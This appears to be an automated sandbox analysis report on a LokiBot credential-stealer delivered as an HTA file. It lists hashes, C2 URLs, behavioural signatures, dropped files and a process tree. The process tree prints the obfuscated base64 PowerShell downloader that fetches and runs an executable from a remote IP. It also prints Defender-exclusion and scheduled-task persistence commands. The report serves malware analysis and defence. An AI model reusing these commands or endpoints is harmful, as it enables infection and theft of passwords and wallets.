Analysis

  • max time kernel
    38s
  • max time network
    144s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21-11-2024 07:35

General

  • Target

    a786cb2ae0dc8117e3bfc07bca8bb0e5d4545ab8f5b4aa042c9ee85dca7b43a0.hta

  • Size

    178KB

  • MD5

    4ce3b0e612e1968b6c491ab1ab818884

  • SHA1

    cbc890a816e9b7e993c90fb63d51526a76616323

  • SHA256

    a786cb2ae0dc8117e3bfc07bca8bb0e5d4545ab8f5b4aa042c9ee85dca7b43a0

  • SHA512

    9b87141b10a2e781e51483dced485817aeb34b545f6dbf64803b4b3621cd4dd74587a5033ab1aa3b931fbd39bc7c77650a0ccdd6b4132b48fbeab9d0fbb3d816

  • SSDEEP

    96:4vCl17HUofTaTGoHTapZR3CyYaMJhS1i3hTaNopQ:4vCldHULTG3pZLYKi3gN2Q

Malware Config

Extracted

Family

lokibot

C2

http://94.156.177.41/simple/five/fre.php

http://kbfvzoboss.bid/alien/fre.php

http://alphastand.trade/alien/fre.php

http://alphastand.win/alien/fre.php

http://alphastand.top/alien/fre.php

Signatures

  • Lokibot

    Lokibot is a Password and CryptoCoin Wallet Stealer.

  • Lokibot family
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file
  • Evasion via Device Credential Deployment 2 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 33 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\a786cb2ae0dc8117e3bfc07bca8bb0e5d4545ab8f5b4aa042c9ee85dca7b43a0.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:3280
    • C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe
      "C:\Windows\sYStem32\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe" "PoWeRSheLL.ExE -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment ; iEx($(iEX('[SysteM.TExT.encODInG]'+[cHAR]58+[cHAR]58+'UTF8.GEtSTrINg([sysTem.cOnVERT]'+[cHAR]58+[chAr]58+'FrOMbASe64StrIng('+[chAR]34+'JG56dWNGVUF3ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUkRFRklOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWlBudFZzUmhBaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNeWpwcUlrUXdEYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1alFRcFNYb0lXeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhWXlwdmx5a3BlKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZFhHTSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV1BmVyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbnp1Y0ZVQXc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzU1L2Nhc3BvbC5leGUiLCIkZU52OkFQUERBVEFcY2FzcG9sLmV4ZSIsMCwwKTtzVGFyVC1TbGVlUCgzKTtpZXggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXGNhc3BvbC5leGUi'+[cHaR]0X22+'))')))"
      2⤵
      • Blocklisted process makes network request
      • Evasion via Device Credential Deployment
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2764
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment
        3⤵
        • Evasion via Device Credential Deployment
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2640
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\fqh3jphh\fqh3jphh.cmdline"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3744
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC2A4.tmp" "c:\Users\Admin\AppData\Local\Temp\fqh3jphh\CSCBF6C05B6915448E28F66191B9F6A879C.TMP"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1948
      • C:\Users\Admin\AppData\Roaming\caspol.exe
        "C:\Users\Admin\AppData\Roaming\caspol.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4724
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\caspol.exe"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4828
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\rrwscqkDSNwLK.exe"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3704
        • C:\Windows\SysWOW64\schtasks.exe
          "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rrwscqkDSNwLK" /XML "C:\Users\Admin\AppData\Local\Temp\tmp343A.tmp"
          4⤵
          • System Location Discovery: System Language Discovery
          • Scheduled Task/Job: Scheduled Task
          PID:2472
        • C:\Users\Admin\AppData\Roaming\caspol.exe
          "C:\Users\Admin\AppData\Roaming\caspol.exe"
          4⤵
          • Executes dropped EXE
          • Accesses Microsoft Outlook profiles
          • outlook_office_path
          • outlook_win_path
          PID:904

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\pOweRShelL.EXe.log

    Filesize

    2KB

    MD5

    968cb9309758126772781b83adb8a28f

    SHA1

    8da30e71accf186b2ba11da1797cf67f8f78b47c

    SHA256

    92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

    SHA512

    4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    18KB

    MD5

    38202961910eba1dae31b0abea906f2c

    SHA1

    8a816445bd72cc54ebd0d0d028dec8877dd9184f

    SHA256

    a409c21e7b7967dd8b9d6c851bb0a506367ec24f9c3bb2f380900e53f362e7e2

    SHA512

    bb25cf01e0dafbde499fa2ea1b4446443e07b5988fd601f617fc4d28aa090267e27b2193f12178fbd1dd2223412473463cba537f357d82effb611999bfe47257

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    17KB

    MD5

    c07d4a9c3cab5bb865ebdd573a366558

    SHA1

    50c0b6fa427d3672cb673ed0c9986d637cd059a8

    SHA256

    e4c875a5953bc9853f79cbbb5e7dbf8c678422b5c15232f85600d2610635b3f7

    SHA512

    44fa77691d15f73d815ddbdbd831123f48a8a8b796de2b3942ac6560ff4cf6624de507800c9b9a7bbd990b48ca24edb4af54a09b0ece8051afe11e73a0ad36ec

  • C:\Users\Admin\AppData\Local\Temp\RESC2A4.tmp

    Filesize

    1KB

    MD5

    f200ef92016b45489bbd235ba63f71a5

    SHA1

    9ae2ab3e4567df9dac68046856d9a1378dd72557

    SHA256

    4765bb4f074b80fc37d18c430c073c5931d6a85f3ba2b09c6001375916b830ef

    SHA512

    3f61853742dea30e1bd5b1552e00feea8a44ca266d0773a5ec8e7ab1c684ada105e496400977cd39f84f2ebfc461f7b958263037a39c30641ea952c7d5a0b80d

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kxcfel11.13o.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Local\Temp\fqh3jphh\fqh3jphh.dll

    Filesize

    3KB

    MD5

    d8ed4e58a37e9303aec70f150a049565

    SHA1

    810460053f97d0e42c00b4d8c0651bb9150556e0

    SHA256

    13544ebaea46b47daef3682d90c40f48f8f6be12bde9875a1c1edadfd3a62676

    SHA512

    41acd4a6c2c560dcb1cf73e7fd4d87dc9ed14f2fa6169e98d2ab483495aca3d5ed995dac4d7640bad2d5ffc7cb63a64bf34a61b9fc194b6bfdfcf2a54fedadcc

  • C:\Users\Admin\AppData\Local\Temp\tmp343A.tmp

    Filesize

    1KB

    MD5

    d3259388c1295044ac9efaf15c965790

    SHA1

    d1b7dfd6424159d1e838f2e6f8ab217cdcf06d2b

    SHA256

    61b1bfad298759fc3534d796ecafcce4088086c498ae9aa7eb0537715d959090

    SHA512

    ec4955def3e77a72789979919808f67daae0ec32d77daf1184d7e6ef8417e6c0843ea484872ba69cdb1f3ad8e983e44f1b424f9896c613224acda0f5ff15aabc

  • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2878641211-696417878-3864914810-1000\0f5007522459c86e95ffcc62f32308f1_4fc725d8-4f7d-4884-b878-08bb0ce6c800

    Filesize

    46B

    MD5

    c07225d4e7d01d31042965f048728a0a

    SHA1

    69d70b340fd9f44c89adb9a2278df84faa9906b7

    SHA256

    8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a

    SHA512

    23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

  • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2878641211-696417878-3864914810-1000\0f5007522459c86e95ffcc62f32308f1_4fc725d8-4f7d-4884-b878-08bb0ce6c800

    Filesize

    46B

    MD5

    d898504a722bff1524134c6ab6a5eaa5

    SHA1

    e0fdc90c2ca2a0219c99d2758e68c18875a3e11e

    SHA256

    878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9

    SHA512

    26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

  • C:\Users\Admin\AppData\Roaming\caspol.exe

    Filesize

    586KB

    MD5

    74061922f1e78c237a66d12a15a18181

    SHA1

    e31ee444aaa552a100f006e43f0810497a3b0387

    SHA256

    89bf888148eae2caabdc6d3fff98054127b197b402493581894a3104ed6b6f1c

    SHA512

    306744107d78b02ecfd28252dae954f0b47c1f761e15a33c937474a2e15284c17bb7e2542618b745ea5f95e5a7dba3d27b675c8837914a44d8b5b350a3d4a136

  • \??\c:\Users\Admin\AppData\Local\Temp\fqh3jphh\CSCBF6C05B6915448E28F66191B9F6A879C.TMP

    Filesize

    652B

    MD5

    78057cdba99e48d2a36a65e34ccb752e

    SHA1

    309542f3a0fb421734838098e41c77d16ddaa683

    SHA256

    014c2d366cd42a7740e7a573ce361bb9e0e2e3fe2e73579ee02411216079e9a5

    SHA512

    ac4271b3ebfe9b61202e2b08446c42f4850541cb7e9f44601587ddb94455ac1cf0b8fa7e85aa81b836530ffabff788eaa217b8700841f99743e3b6a133f4076b

  • \??\c:\Users\Admin\AppData\Local\Temp\fqh3jphh\fqh3jphh.0.cs

    Filesize

    484B

    MD5

    fe82050659a8b97690d60529499222c1

    SHA1

    7cc50135852b46dd1e36f2ff98506613db525a68

    SHA256

    64c38563c4588b718b03aec685677f173456d3c961ef97cd95e7784ee1e51a6a

    SHA512

    59356fd5cbb38a06bf09e182b8ed7c7c2200e6f8de8e950be38bee0c45aa96b2dbf202bdc56097a74acc4e0a8bc601558e83c098a376630cfa1bcce64133d64f

  • \??\c:\Users\Admin\AppData\Local\Temp\fqh3jphh\fqh3jphh.cmdline

    Filesize

    369B

    MD5

    398a9341ef888048c2256e68b5d90427

    SHA1

    7384a1d094a0515737408fab45c9511f5be82ea1

    SHA256

    ed7ccb2559c691dca3653465f397a16f66b371689820b263f6ad830cbd11e8cc

    SHA512

    806e01a9efafe92d9267dec26d8c44a8c2c6aded26e8cccaedbc0dad322db55ccd02e3d7b3923e488b0c25b72168cc31ddf7c5d50a7924c705b8e9be62cca377

  • memory/904-116-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/904-114-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/904-165-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/904-172-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/2640-41-0x00000000073F0000-0x0000000007493000-memory.dmp

    Filesize

    652KB

  • memory/2640-29-0x00000000073A0000-0x00000000073D2000-memory.dmp

    Filesize

    200KB

  • memory/2640-45-0x00000000077B0000-0x0000000007846000-memory.dmp

    Filesize

    600KB

  • memory/2640-46-0x0000000007720000-0x0000000007731000-memory.dmp

    Filesize

    68KB

  • memory/2640-47-0x0000000007750000-0x000000000775E000-memory.dmp

    Filesize

    56KB

  • memory/2640-48-0x0000000007760000-0x0000000007774000-memory.dmp

    Filesize

    80KB

  • memory/2640-49-0x0000000007870000-0x000000000788A000-memory.dmp

    Filesize

    104KB

  • memory/2640-50-0x00000000077A0000-0x00000000077A8000-memory.dmp

    Filesize

    32KB

  • memory/2640-43-0x0000000007520000-0x000000000753A000-memory.dmp

    Filesize

    104KB

  • memory/2640-42-0x0000000007B70000-0x00000000081EA000-memory.dmp

    Filesize

    6.5MB

  • memory/2640-44-0x0000000007580000-0x000000000758A000-memory.dmp

    Filesize

    40KB

  • memory/2640-40-0x0000000007380000-0x000000000739E000-memory.dmp

    Filesize

    120KB

  • memory/2640-30-0x000000006DA50000-0x000000006DA9C000-memory.dmp

    Filesize

    304KB

  • memory/2764-7-0x0000000005870000-0x00000000058D6000-memory.dmp

    Filesize

    408KB

  • memory/2764-2-0x0000000005120000-0x0000000005748000-memory.dmp

    Filesize

    6.2MB

  • memory/2764-72-0x0000000071190000-0x0000000071940000-memory.dmp

    Filesize

    7.7MB

  • memory/2764-73-0x0000000071190000-0x0000000071940000-memory.dmp

    Filesize

    7.7MB

  • memory/2764-65-0x0000000006490000-0x0000000006498000-memory.dmp

    Filesize

    32KB

  • memory/2764-1-0x00000000025F0000-0x0000000002626000-memory.dmp

    Filesize

    216KB

  • memory/2764-3-0x0000000071190000-0x0000000071940000-memory.dmp

    Filesize

    7.7MB

  • memory/2764-6-0x0000000005800000-0x0000000005866000-memory.dmp

    Filesize

    408KB

  • memory/2764-4-0x0000000071190000-0x0000000071940000-memory.dmp

    Filesize

    7.7MB

  • memory/2764-5-0x00000000050A0000-0x00000000050C2000-memory.dmp

    Filesize

    136KB

  • memory/2764-83-0x0000000071190000-0x0000000071940000-memory.dmp

    Filesize

    7.7MB

  • memory/2764-19-0x0000000005F90000-0x0000000005FDC000-memory.dmp

    Filesize

    304KB

  • memory/2764-18-0x0000000005EE0000-0x0000000005EFE000-memory.dmp

    Filesize

    120KB

  • memory/2764-71-0x000000007119E000-0x000000007119F000-memory.dmp

    Filesize

    4KB

  • memory/2764-0-0x000000007119E000-0x000000007119F000-memory.dmp

    Filesize

    4KB

  • memory/2764-17-0x00000000059E0000-0x0000000005D34000-memory.dmp

    Filesize

    3.3MB

  • memory/3704-120-0x000000006DFE0000-0x000000006E02C000-memory.dmp

    Filesize

    304KB

  • memory/3704-144-0x0000000007770000-0x0000000007781000-memory.dmp

    Filesize

    68KB

  • memory/3704-145-0x00000000077B0000-0x00000000077C4000-memory.dmp

    Filesize

    80KB

  • memory/3704-136-0x0000000007400000-0x00000000074A3000-memory.dmp

    Filesize

    652KB

  • memory/4724-88-0x0000000004FC0000-0x0000000004FD2000-memory.dmp

    Filesize

    72KB

  • memory/4724-89-0x0000000006740000-0x00000000067A4000-memory.dmp

    Filesize

    400KB

  • memory/4724-87-0x0000000005080000-0x000000000511C000-memory.dmp

    Filesize

    624KB

  • memory/4724-86-0x0000000004D90000-0x0000000004D9A000-memory.dmp

    Filesize

    40KB

  • memory/4724-85-0x0000000004DD0000-0x0000000004E62000-memory.dmp

    Filesize

    584KB

  • memory/4724-84-0x00000000052E0000-0x0000000005884000-memory.dmp

    Filesize

    5.6MB

  • memory/4724-82-0x0000000000430000-0x00000000004C8000-memory.dmp

    Filesize

    608KB

  • memory/4828-95-0x0000000005390000-0x00000000056E4000-memory.dmp

    Filesize

    3.3MB

  • memory/4828-130-0x000000006DFE0000-0x000000006E02C000-memory.dmp

    Filesize

    304KB

  • memory/4828-119-0x00000000060F0000-0x000000000613C000-memory.dmp

    Filesize

    304KB